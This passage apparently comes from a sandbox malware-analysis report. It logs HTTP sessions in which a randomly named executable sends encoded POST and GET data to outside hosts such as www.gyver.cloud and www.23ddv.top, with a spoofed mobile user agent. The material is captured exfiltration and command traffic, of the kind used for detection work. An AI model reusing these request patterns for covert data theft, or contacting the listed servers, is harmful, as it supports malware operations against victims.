AvLLLbOh=0bhQVKHgQ8aTZRlTvPBtdzdaFS3PUhq+Sz4p4LLL8tvCrM2lNY1h1xMNcGXheJdg/ym3GzyjaHsd79FCQCKruaTHR2Fw+p7DG8cLJQY5fQt7gp8JjWGReCIzBsGc6rXFDVU24D1RAm0kIolH6nO6G0rBZQOSc5CPAFlFZshaQmxHpUEOUYdMo72vUWQZ6GRBjkpxqvHzzQXpvynvpPRGUZl76GBw2GkE0KO4vKecT8Pa3/qgnydRNwK80Y7ghVVMTy5Y9s0nMBmxpzGTAcszUEz/qRWPyE8n7FQNpvecYafPfFGUfKsFP92Z4HqOnMmNvn5kB13zRIJZHHvkEtmy/4+tQ2Qb5uLxJu3Q1TByZf1+o/G0Zv4BzYHbA9OXMCeKLv49Azow+fXWycAmgUta50OAr9KUiy/IDXiACmnUzgFAYtCob9KDd5r1+9f5hi+V9YdDzxEJCyje7GCQj1zO+t54YDQ8t0d8Qqkbd/ypILM5jkyXX5O36BOxYI9golOEWB3QMuTo4tGtV6JFCH7fbjJCCYSFYJLU2kf/Eri8e6meZR6ynZob+5++tvvMvwn2OEIai1vZC5ymDRrlcq6MitUqNRWDvrw/EX2Uo0dKPo8hMOdfD6bUDWQdZrbAJEpLUL+eyqZcEMMpFRCQlF7az7kP+F4lQlS4cYAhtJ03LiMOTQ4rFugD1AzWf5Lr8Emx1k6r3eDBACZyvgvLsEkm/DX1MfIQryVESY62Wff5GsxUWETx43ZwEqDgzvaUwJQ56w7ItaNZuawc+Q+vdhejkg7XH9dX9ry4o91AcgoYLihMmN96NrZsZ8tloS+HVXMefFA2eHB2u9rs8PbGJ48e8ZIqsAAJbgWLasZqGYFzxyWeXzS821gcx9nPaUC/8OjSED7rgrmar4ugMhVwXQXjgK8+jRJe9Hg+SqlaxR8z5zR0PFU0w37RqYxrs/3CT5K0DhHP5DyUhCruDK+c3afzITPjbmuq1p615OEdewBPKo2 [TRUNCATED]
Aug 27, 2024 17:50:03.142180920 CEST	1289	OUT	Data Raw: 64 4e 39 67 41 4d 73 37 66 53 51 43 46 2f 72 6a 6e 64 77 62 79 30 56 2f 64 58 44 52 79 6d 2f 53 4f 79 70 57 48 54 38 71 47 72 54 74 36 74 6a 34 32 31 48 6b 66 77 65 50 33 50 37 33 4e 32 33 6e 43 70 32 7a 50 38 58 32 38 77 6b 55 48 42 77 35 6a 74 Data Ascii: dN9gAMs7fSQCF/rjndwby0V/dXDRym/SOypWHT8qGrTt6tj421HkfweP3P73N23nCp2zP8X28wkUHBw5jtYcGbAsHmU+KB4cjF2N7Bmyks/l6Te1ixs6c5YLxPXJ1xubAbTfuk+hsHSgczyYQBvv7fQjjdK7hr2OSLrWLDGB0NtMrG0Ffve9TH52WwOSjl5/G7Ns7zdEbUqmAJosk4YfbwM+XEACpGmfsS76L/1rqKxJO00CWpy
Aug 27, 2024 17:50:03.142230034 CEST	2578	OUT	Data Raw: 44 46 68 44 2b 35 39 49 73 79 36 36 6b 37 4d 63 68 73 75 78 7a 50 63 70 53 30 59 58 49 33 50 66 67 49 61 2b 6d 67 66 46 37 62 51 4e 38 34 61 6d 70 64 7a 56 6b 77 48 6c 36 52 55 75 78 30 69 69 6f 53 50 74 37 47 34 38 63 4d 51 6e 58 2f 6d 76 50 6b Data Ascii: DFhD+59Isy66k7MchsuxzPcpS0YXI3PfgIa+mgfF7bQN84ampdzVkwHl6RUux0iioSPt7G48cMQnX/mvPkRb15R73PFh4O6lCYOSlPwG7WUVCmCqIKbfaKSXK+uFvUVMyUy6vS7PLR4ap+E/OJtSIaQG7F3M1uQP0Qv23f3aYdzG/QlaG7jzPtZemYsXnG5ruHXI8sa5Z5+FcVxf9HSOcltXNvezC3lp986AIrYFwutkNxIn5VP
Aug 27, 2024 17:50:03.472155094 CEST	2578	OUT	Data Raw: 57 57 6b 5a 79 44 57 54 30 55 4f 6b 54 49 42 48 76 2f 32 77 63 45 37 47 2f 62 38 73 73 4d 36 51 68 46 39 52 33 69 71 52 6d 2f 67 5a 61 70 61 2b 6c 30 75 4f 6a 45 43 44 65 72 57 4b 58 47 66 59 2f 43 43 31 55 78 34 51 4a 65 45 75 6d 5a 61 53 7a 2f Data Ascii: WWkZyDWT0UOkTIBHv/2wcE7G/b8ssM6QhF9R3iqRm/gZapa+l0uOjECDerWKXGfY/CC1Ux4QJeEumZaSz/SFPjlfv8qwMpei0kLQjHJJ2aHvG9rGPKCiFxLYXndwOx4Rd+xjiuP4xVbBssl602Qs9P4+MA6z6eOaB/kf/IK2Cknq3HAlNNO/gnnWJy98idNBwkI3Oy/He85xdKOe4xI0cgevZaUQpckEqzGYklk9FMcYx2jgzFd
Aug 27, 2024 17:50:03.472477913 CEST	2578	OUT	Data Raw: 6d 6a 47 6d 58 55 69 36 77 56 67 71 78 49 6d 77 4a 61 4a 48 31 6c 6e 32 63 6d 44 41 35 4a 57 72 73 48 52 4c 77 72 33 67 7a 53 41 65 41 4b 58 79 50 50 2f 36 78 50 69 36 51 76 49 34 48 31 57 41 72 79 34 65 71 4c 33 66 7a 6f 4d 30 45 69 6a 6f 30 4b Data Ascii: mjGmXUi6wVgqxImwJaJH1ln2cmDA5JWrsHRLwr3gzSAeAKXyPP/6xPi6QvI4H1WAry4eqL3fzoM0Eijo0K3Y2G/QjHC2Ifz/bHJluvSZc5osvWpTuh3sjifLj4ZY+KAVmPjHiJLD959e1jO0Hz1xwpXMCpxKQHzd/9KRbtkLTnhpc4MSbH9ox7P2pf+KUGEs5f29vAIv8OU8B2g4EiLMHy80MUMDmb1CflgL59xvciaTJg8yeg+
Aug 27, 2024 17:50:03.472871065 CEST	7734	OUT	Data Raw: 65 47 74 31 6f 47 34 32 44 69 52 43 66 64 68 33 56 37 54 66 43 78 75 43 4b 51 58 30 78 76 4b 67 69 74 30 36 57 45 6e 5a 33 39 62 2f 51 4a 78 44 4d 71 63 6d 63 63 6f 41 77 62 6d 77 75 39 30 67 63 61 62 2b 65 71 41 6a 66 52 71 77 64 4b 49 46 6c 79 Data Ascii: eGt1oG42DiRCfdh3V7TfCxuCKQX0xvKgit06WEnZ39b/QJxDMqcmccoAwbmwu90gcab+eqAjfRqwdKIFlyrxWFN1OGH96L/jHc7/aER69PNJ1O15n26yncT6IgSAIPyEj5g/Bu/gzA85aUHi3uPtxgdmq3gNwacGAkyiKMMmEbL7joOayChEy/llvG2oBlCIxZkI3yjDUABpDnZ0p9Bh9H6ALKGRhI74tDXyRrGLbXIUfGoZKg3
Aug 27, 2024 17:50:03.473087072 CEST	1289	OUT	Data Raw: 48 49 45 65 52 35 39 38 66 77 6f 66 78 65 6e 31 70 6e 41 51 32 4f 71 73 47 31 39 30 48 41 63 36 66 61 74 4a 50 78 68 37 43 6b 4f 2f 34 2b 4b 76 61 2b 73 6c 48 2b 39 32 2f 6a 31 33 4a 4c 4e 36 37 70 30 72 6b 66 34 41 30 69 71 7a 42 35 47 74 4e 76 Data Ascii: HIEeR598fwofxen1pnAQ2OqsG190HAc6fatJPxh7CkO/4+Kva+slH+92/j13JLN67p0rkf4A0iqzB5GtNv07SEvUXhANB5R3egKFuBjMOknKud24AKGM3nI1/MDBL1gguoO3XKg0+DK7BFIsCT8+KK6+7IlxBe+ZHXFCYZujiJb5ikKVoBRZLrXald6WGtA0VyGJdFhW44j8FqNVUFeUJC4l1JLsRm7Ga3ot2eChXiPHejQsUNk
Aug 27, 2024 17:50:03.473258972 CEST	11601	OUT	Data Raw: 61 5a 57 5a 34 73 31 56 76 54 6a 61 50 6b 31 34 56 4e 59 33 46 35 4d 79 67 76 6e 74 6f 76 70 43 75 47 66 32 36 50 50 56 37 51 53 4e 34 78 66 66 39 2b 47 57 71 79 77 72 76 2b 64 67 62 39 6c 72 37 48 52 59 57 46 7a 78 6c 56 6d 36 45 62 69 76 34 6e Data Ascii: aZWZ4s1VvTjaPk14VNY3F5MygvntovpCuGf26PPV7QSN4xff9+GWqywrv+dgb9lr7HRYWFzxlVm6Ebiv4nDEwgC52vvoi3Ry8/2XJPml+4DpxzT6f/Ay+JlW+V22w+R2IJU44g/3WuRc/gaq3iZ05gl8qm/BqDoJ+MCOWeObQMipbG4Sk7fWQ/f9ivVFtwn/o07IbT1KvN/tZku+YMl6yXbtLA8hzjZKz0QGFLMm3b5gPNRYCe5
Aug 27, 2024 17:50:03.802228928 CEST	2578	OUT	Data Raw: 6f 69 2b 32 6b 6d 50 70 30 2b 71 5a 33 55 54 77 4a 33 77 73 46 72 78 6d 46 42 31 77 33 41 5a 5a 32 66 34 4d 58 35 36 48 38 75 49 4e 71 58 76 32 4c 61 36 61 57 67 58 32 36 6b 4a 32 78 6c 43 66 6f 6f 4e 75 4f 45 34 5a 69 4c 68 51 35 6b 6a 63 6f 2f Data Ascii: oi+2kmPp0+qZ3UTwJ3wsFrxmFB1w3AZZ2f4MX56H8uINqXv2La6aWgX26kJ2xlCfooNuOE4ZiLhQ5kjco/uadjaRdFMhGiobQE1Iq9BjwTW96higsKB8iIyAKHdct+Z9JGx04hLu+Suic7ObSpNZ6KQhBy/c/GbbaA0YJffjsG8REFpx/tRoKsWHoAjkO2JBAzaOdhdsQCkJivYO5bSyDiEXZsL2nDJzlZsjqqGTKmgYD/aZCxZ
Aug 27, 2024 17:50:03.802529097 CEST	5156	OUT	Data Raw: 63 55 4f 56 47 34 32 72 75 57 4a 73 46 59 35 41 68 31 39 65 7a 4b 47 59 51 39 53 6e 4d 53 4b 50 46 72 2f 63 63 51 5a 66 44 32 6c 6d 61 71 71 47 5a 70 30 32 48 51 4c 56 72 44 37 76 30 38 6b 4f 4b 49 76 74 76 45 42 46 54 68 35 4c 2f 53 47 37 33 4e Data Ascii: cUOVG42ruWJsFY5Ah19ezKGYQ9SnMSKPFr/ccQZfD2lmaqqGZp02HQLVrD7v08kOKIvtvEBFTh5L/SG73NuHT0grUY0YdmzO62Jc2leUHUQZCZD/CxT4pCOE10r+WGSc7sFiQlrhG0vE3f4aEhZqHIg7T4B6IrHbhvCGyW8PTWaCQnbI1McF8+oJw7qx6ml5nwilW9fFoMLX5eE6WAG3DRpdgdtVLgiO8WYAM0/oiOsKMzhshvA
Aug 27, 2024 17:50:03.802747011 CEST	1289	OUT	Data Raw: 79 30 6d 4b 39 62 6b 45 56 54 64 50 62 7a 6c 57 75 62 7a 4a 35 42 58 76 6d 39 5a 6c 2f 6e 59 65 38 31 51 50 69 5a 48 37 79 6b 74 4f 46 6d 4e 38 73 6e 75 48 71 35 6b 73 6f 71 76 74 63 56 66 36 6b 78 47 71 36 47 76 4f 48 45 56 2f 45 36 79 5a 2b 63 Data Ascii: y0mK9bkEVTdPbzlWubzJ5BXvm9Zl/nYe81QPiZH7yktOFmN8snuHq5ksoqvtcVf6kxGq6GvOHEV/E6yZ+c/LB0tFexyUqD2m0GuWttuQUQeSI059PWenypLzRzNDDsYpEKZ4DxkHTRiR6rYyOzLtZEs9Q4QBqyuv18EhoCw7KtbiIwPHMzJrTlUPsC4J4tNoFFxC3KLvLknCIXG3wjn5CZB0fT1FIrOS1VGXMZ4/sX0j6lqDCWN
Aug 27, 2024 17:50:04.133299112 CEST	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 15:50:03 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a4f874-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.11.20	49855	154.23.184.218	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:50:05.969963074 CEST	522	OUT	GET /y2fc/?AvLLLbOh=5ZJwW+6cR+ukQX5L66hOVx0TNjHyeT2hZgA90YyTgMK9x7yRXodN7xJ1LlWJY5c/jX+OBDC/YU0F38ZFJDu2iru/QAMqsMv9PfcDIAk5SRBflopttme4W2g=&7RB=66nPyLG8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.23ddv.top Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Aug 27, 2024 17:50:06.271667957 CEST	312	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 27 Aug 2024 15:50:06 GMT Content-Type: text/html Content-Length: 148 Connection: close ETag: "66a4f874-94" Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.11.20	49856	76.223.67.189	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:50:11.394592047 CEST	785	OUT	POST /7arp/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.gyver.cloud Origin: http://www.gyver.cloud Referer: http://www.gyver.cloud/7arp/ Content-Length: 205 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 51 64 61 63 34 74 61 74 41 71 38 39 4c 66 2f 58 6e 77 39 56 75 5a 56 6b 54 77 42 4b 37 35 6a 52 67 5a 7a 61 35 41 30 59 32 66 51 66 6f 77 4b 70 35 33 39 45 44 4d 6a 5a 78 49 37 31 48 66 72 51 31 57 79 4a 2b 59 52 45 55 47 61 31 78 7a 4b 6b 72 50 4e 59 45 4d 41 6d 54 34 61 4d 65 6d 63 4e 69 7a 62 59 2b 37 6e 45 37 4e 71 49 65 66 35 32 50 36 52 43 2b 5a 58 4e 6b 41 46 6a 70 71 47 57 50 38 78 76 4b 71 59 39 63 63 4c 4c 79 46 73 47 45 5a 37 47 50 46 65 37 51 78 42 56 79 57 33 6e 75 5a 51 7a 35 31 66 72 6b 6b 54 42 41 34 6e 6f 43 4b 35 62 34 72 69 45 4b 30 5a 79 7a 59 30 32 76 77 3d 3d Data Ascii: AvLLLbOh=Qdac4tatAq89Lf/Xnw9VuZVkTwBK75jRgZza5A0Y2fQfowKp539EDMjZxI71HfrQ1WyJ+YREUGa1xzKkrPNYEMAmT4aMemcNizbY+7nE7NqIef52P6RC+ZXNkAFjpqGWP8xvKqY9ccLLyFsGEZ7GPFe7QxBVyW3nuZQz51frkkTBA4noCK5b4riEK0ZyzY02vw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.11.20	49857	76.223.67.189	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:50:14.034516096 CEST	1125	OUT	POST /7arp/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.gyver.cloud Origin: http://www.gyver.cloud Referer: http://www.gyver.cloud/7arp/ Content-Length: 545 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 51 64 61 63 34 74 61 74 41 71 38 39 49 2f 76 58 6b 58 70 56 37 4a 56 6a 57 77 42 4b 77 5a 6a 56 67 5a 2f 61 35 42 78 46 32 4d 34 66 6f 53 53 70 36 31 5a 45 47 4d 6a 5a 37 6f 37 77 59 76 72 68 31 57 2f 30 2b 5a 42 45 55 47 6d 31 72 68 43 6b 38 76 4e 5a 64 38 41 35 51 34 61 4e 61 6d 63 51 69 7a 65 35 2b 35 62 45 36 39 4f 49 66 63 42 32 65 34 35 42 31 5a 58 50 78 51 46 67 2f 61 47 59 50 38 4e 6e 4b 76 55 4c 62 75 58 4c 79 6b 41 47 57 4a 37 5a 59 46 65 67 66 52 41 34 6b 54 72 71 6d 35 77 35 31 47 50 72 6a 58 58 69 4d 36 4c 4f 44 73 4e 6c 70 5a 79 54 43 51 63 53 6d 63 78 61 72 67 72 71 78 4f 66 4f 64 47 4e 66 72 65 43 5a 6a 66 37 41 72 42 74 2f 76 4f 68 6f 34 73 5a 57 6f 36 66 57 50 52 67 4d 54 39 76 50 30 37 39 39 4a 6e 45 59 30 53 7a 79 41 5a 65 41 67 46 4e 46 68 55 33 75 56 5a 6d 68 33 73 57 41 35 61 49 51 4f 46 7a 65 79 4d 46 48 76 54 5a 73 45 72 45 50 70 72 68 34 51 7a 37 65 68 63 32 74 53 54 70 46 54 4f 65 36 42 6a 2b 6a 69 64 79 4e 75 57 79 54 47 4d 44 69 44 39 66 4b 4e [TRUNCATED] Data Ascii: AvLLLbOh=Qdac4tatAq89I/vXkXpV7JVjWwBKwZjVgZ/a5BxF2M4foSSp61ZEGMjZ7o7wYvrh1W/0+ZBEUGm1rhCk8vNZd8A5Q4aNamcQize5+5bE69OIfcB2e45B1ZXPxQFg/aGYP8NnKvULbuXLykAGWJ7ZYFegfRA4kTrqm5w51GPrjXXiM6LODsNlpZyTCQcSmcxargrqxOfOdGNfreCZjf7ArBt/vOho4sZWo6fWPRgMT9vP0799JnEY0SzyAZeAgFNFhU3uVZmh3sWA5aIQOFzeyMFHvTZsErEPprh4Qz7ehc2tSTpFTOe6Bj+jidyNuWyTGMDiD9fKN8YvqjtWW6vnv2Xp9OT3E46XHXNaVhbQeipRJtAzOeb5PCGK4+inyFq7/0L3lASkw3njdv7tbWTwWWdGJTXs5NzeasL6uscKjQEkffeiBx8kIDSB1J+Al3URlLka2s7mGoyYoarn5Mxey+ej8bewmfVEtz22LumxGptF0Mm2dr1MR6UtrIRpB/sFaZQEz7k/OirfP9MN0eiG43Q=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.11.20	49858	76.223.67.189	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:50:16.675647020 CEST	2578	OUT	POST /7arp/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.gyver.cloud Origin: http://www.gyver.cloud Referer: http://www.gyver.cloud/7arp/ Content-Length: 52933 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 51 64 61 63 34 74 61 74 41 71 38 39 49 2f 76 58 6b 58 70 56 37 4a 56 6a 57 77 42 4b 77 5a 6a 56 67 5a 2f 61 35 42 78 46 32 4b 67 66 70 6e 4f 70 36 55 5a 45 42 4d 6a 5a 33 49 37 78 59 76 72 47 31 57 32 2f 2b 5a 4e 2b 55 41 71 31 79 57 6d 6b 38 39 56 5a 4c 73 41 34 56 34 61 50 65 6d 64 4d 69 7a 62 2b 2b 34 2b 7a 37 4e 53 49 65 62 39 32 49 5a 35 43 32 4a 58 4e 78 51 46 73 30 36 47 6d 50 38 35 4a 4b 76 51 4c 62 73 54 4c 78 77 6f 47 46 6f 37 5a 66 56 65 6e 57 78 41 37 32 54 71 51 6d 35 31 41 31 47 50 56 6a 57 54 69 4d 36 72 4f 43 72 78 69 71 35 79 54 4c 77 63 52 33 73 31 65 72 67 47 70 78 4f 37 4f 64 42 4a 66 71 2b 43 5a 70 61 58 44 6a 42 74 39 69 75 67 79 75 73 64 65 6f 36 4b 6e 50 55 34 4d 53 4e 72 50 75 6f 56 39 46 6b 63 59 36 53 7a 77 50 35 65 58 72 6c 4d 65 68 55 47 48 56 59 48 55 33 76 36 41 6a 2b 55 51 46 45 7a 5a 78 73 46 42 32 6a 59 30 57 62 41 54 70 72 77 6e 51 7a 36 46 68 64 79 74 53 48 56 46 42 4d 32 39 4d 54 2f 72 71 39 79 45 37 6d 2b 4a 47 4d 50 71 44 2b 66 61 4e [TRUNCATED] Data Ascii: AvLLLbOh=Qdac4tatAq89I/vXkXpV7JVjWwBKwZjVgZ/a5BxF2KgfpnOp6UZEBMjZ3I7xYvrG1W2/+ZN+UAq1yWmk89VZLsA4V4aPemdMizb++4+z7NSIeb92IZ5C2JXNxQFs06GmP85JKvQLbsTLxwoGFo7ZfVenWxA72TqQm51A1GPVjWTiM6rOCrxiq5yTLwcR3s1ergGpxO7OdBJfq+CZpaXDjBt9iugyusdeo6KnPU4MSNrPuoV9FkcY6SzwP5eXrlMehUGHVYHU3v6Aj+UQFEzZxsFB2jY0WbATprwnQz6FhdytSHVFBM29MT/rq9yE7m+JGMPqD+faN7gvqDtWUdzkhGXugeSuJY6mHXB3Vkj6dSFRIdQzEuavECGOzei62Fq7/0HJlAWk3GvjfdjtLRnwUWdAJTX95N/lasDlusMwjW8kfuuiC0QnNzSA/p+X6nROlLIs2sqEFaGY6q7nqcxd3eee27ecieodtz6MLuChGrtFkqL5MoRxNZAw2t4QW/kOQ5U48p4zJFPHRN0nmdm7rghsCuB+cIgsvzxbKRE01Wb1FYcQsfql7A/tgh/76/CycUUjbtPALjoIiA+cHUJrShC6Cx9GNREzSytVXwuBgCYNAA4ycTwEITp0E7BxZC1ACsax2/3drYI9/A0yluIIPGjMLmSSTe8iDCkYdtTyTAhMVTNV/ykAA3DTvchT0H6yuOaOD6qyFIs1Gg7PRm9gFCY5X/J6DNWr0B8PcS6taD95ootFDpHX7AuBvFLg7eUdeVhBLPbBizXCxrG7nLFnCkLcOhffbz2SQHjtO7vAWPeDHdCWvlkkBIvnKCO8RgXTUWMX+S60QdfSIkzKe0xX+zdlql0ZS2tmhEnVDdK3IdD5bmsewjlVV5mrIzxva7jDy5QG7TQa8mrTN6hC+fUqM+YSNL1u8LaacF9gxC1j0kdug+1bIy9Gg4yuMWek2QDeItqE7778Lt2CbDS+fHNijsmmZYfvtkqhL1Wuwzf7yQI [TRUNCATED]
Aug 27, 2024 17:50:16.675700903 CEST	7734	OUT	Data Raw: 71 35 6b 59 51 35 6d 43 50 4c 4a 51 79 53 4f 39 43 33 32 44 56 63 31 73 4f 37 59 45 63 43 78 33 61 6f 54 6e 4e 6b 6e 67 4d 70 53 33 44 54 41 6f 53 48 55 59 70 67 4e 52 41 54 72 6e 41 62 75 4e 6b 57 39 46 4c 4f 41 35 51 70 66 53 76 54 7a 52 53 68 Data Ascii: q5kYQ5mCPLJQySO9C32DVc1sO7YEcCx3aoTnNkngMpS3DTAoSHUYpgNRATrnAbuNkW9FLOA5QpfSvTzRShez6GKRjtuJ4t3ekY87yTMOwvYw8cErmB/kmgxu4f29k12u7Aox+uDP75CB5bx32lR8ljgjYwkjq/tGzeDPm1mnoAKE61Vg4mTKk9NoM2p6Mq4s9oY1UvT//jyYQOWUL1Aaj8cjxwWqrft2DR76Qgi2dovVLA0lR75
Aug 27, 2024 17:50:16.675751925 CEST	2578	OUT	Data Raw: 78 39 58 4f 6b 63 44 51 4b 76 6e 78 54 56 4c 63 7a 72 4f 47 49 45 42 47 34 54 62 6a 4a 57 69 4a 74 42 65 4c 7a 78 58 49 71 4b 54 2f 48 61 4a 61 53 57 39 39 62 78 58 56 4f 6e 6c 53 4b 31 4f 70 62 39 4c 57 6d 6c 48 53 42 79 4a 49 42 42 6c 42 46 4f Data Ascii: x9XOkcDQKvnxTVLczrOGIEBG4TbjJWiJtBeLzxXIqKT/HaJaSW99bxXVOnlSK1Opb9LWmlHSByJIBBlBFOGf8KufCnlTLSOshFvCJQQQG1YMnhWbxVWW8rtOra5ppFZdO2W4bhHEf2mY6TLGH6qAJhg3Gc3g/AQoHxESz5g7ZkMZ0l5BszfOWIrHLe2oA50x8BfE5ltIM1qUImIqEK8rc7iv+Hiu0U4kvJ3fJu5LnCRmUkJ14En
Aug 27, 2024 17:50:16.776730061 CEST	2578	OUT	Data Raw: 51 46 71 73 39 6f 4d 53 55 37 30 57 62 51 2b 56 68 77 6a 63 57 39 73 6b 6c 45 70 69 44 4a 41 68 2b 79 2f 69 72 2f 74 47 45 57 39 67 46 4a 45 6e 2f 42 71 39 2b 65 42 46 72 78 76 6c 6b 62 57 48 30 35 53 36 2b 67 33 6f 2b 35 52 61 44 31 52 66 47 6f Data Ascii: QFqs9oMSU70WbQ+VhwjcW9sklEpiDJAh+y/ir/tGEW9gFJEn/Bq9+eBFrxvlkbWH05S6+g3o+5RaD1RfGoQJWCqb7VI4BRPVwC7niHmklw2oxL1em3xBI4YDy3uTL2udaGQkI3cX9A4kISt3N5q3WnmdQkoBM7iX89Hdm6PlI+UeM2oNJ59qfleuCmLZRFfb6l/bYMWsgbxpEPZggvcn7vic8BZ9wato8AYjgaz42CZaGbNkkxp
Aug 27, 2024 17:50:16.776817083 CEST	2578	OUT	Data Raw: 42 67 4a 31 6f 48 47 74 30 41 5a 6e 7a 78 5a 56 70 58 77 67 4a 57 4e 44 59 71 62 6d 55 4a 51 54 36 38 41 58 6d 71 37 53 52 33 77 75 71 39 79 65 74 72 67 38 34 34 78 39 6f 62 4c 56 4e 4c 69 63 6a 49 4e 34 2f 45 64 51 74 6a 44 61 47 46 49 2b 50 6e Data Ascii: BgJ1oHGt0AZnzxZVpXwgJWNDYqbmUJQT68AXmq7SR3wuq9yetrg844x9obLVNLicjIN4/EdQtjDaGFI+Pn5a22AtHVx8zrsfRcBRuDNTGq6xN4nyq2CvimJVeqjBUFHxtC1mu+FefByqva48g4Kg4Zf/gH/6msiguHaor5SSposi/Sn7e7zOYf+O0kXDoyAoHYhHSPboKNO4yL2AbnuxgRgPIr1i2FKMQXNKOBLmUAbrRw6obot
Aug 27, 2024 17:50:16.776999950 CEST	2578	OUT	Data Raw: 62 6c 42 6b 42 49 73 62 70 6a 4f 2f 65 69 33 36 7a 67 6c 38 74 65 43 30 71 43 36 36 51 49 72 31 42 58 31 36 31 50 4f 46 67 57 63 38 4a 77 39 77 58 52 31 35 77 5a 65 45 2b 4a 4e 35 55 79 62 50 50 50 58 55 30 56 64 78 67 52 54 75 73 39 64 6f 6e 76 Data Ascii: blBkBIsbpjO/ei36zgl8teC0qC66QIr1BX161POFgWc8Jw9wXR15wZeE+JN5UybPPPXU0VdxgRTus9donv/KO5oJal+ecvcQZptSLTpQvKo2WuWWXYzbpPZl4ItI5mswgNia60Z/0jcn3W5a3cU8XEEK4GcONdAmokkdHsAAvjc6BHiCUT+LLd4aRvndUiWS87DD78yq6MZPSuOQtCtZdRMX09gXHoVFccWZ+5POJP6HQLgHX6x
